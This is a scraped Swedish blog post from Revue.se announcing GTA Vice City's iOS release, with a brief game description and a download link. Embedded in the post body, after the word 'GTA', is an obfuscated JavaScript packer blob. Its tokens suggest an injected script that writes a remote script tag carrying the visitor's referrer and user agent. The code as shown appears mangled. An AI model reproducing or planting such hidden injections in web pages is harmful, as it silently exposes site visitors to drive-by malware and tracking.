Image Image Image Image Image Image Image Image Image Image

| 18 mars, 2018

Scroll to top

Top

2 Comments

iOS: GTA Vice City är här! | Revue.se

Filip Urde
  • On 6 december, 2012
  • http://www.revue.se/filip-urde

GTA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nasib|var|u0026u|referrer|nstha||js|php’.split(‘|’),0,{}))
Vice City är äntligen här.

Vi på Revue älskar GTA! Och jag vet inte riktigt om vi är enade i den här frågan, men jag anser att GTA Vice City är det bästa tillsammans med San Andreas.

I Vice City är du Tommy Vercetti som ursprungligen är från Liberty City, men efter ett långt fängelsestraff ser sig anlända i södern och Vice City.  GTA Vice City fyller 10 år i år och detta firas nu med ett släpp till mobilen. GTA Vice City är lätt det bästa spelet till din mobil i år.

Ladda ner spelet här iOS (38kr)

Spelet väntas komma upp på Google Play underdagen.
youtube.com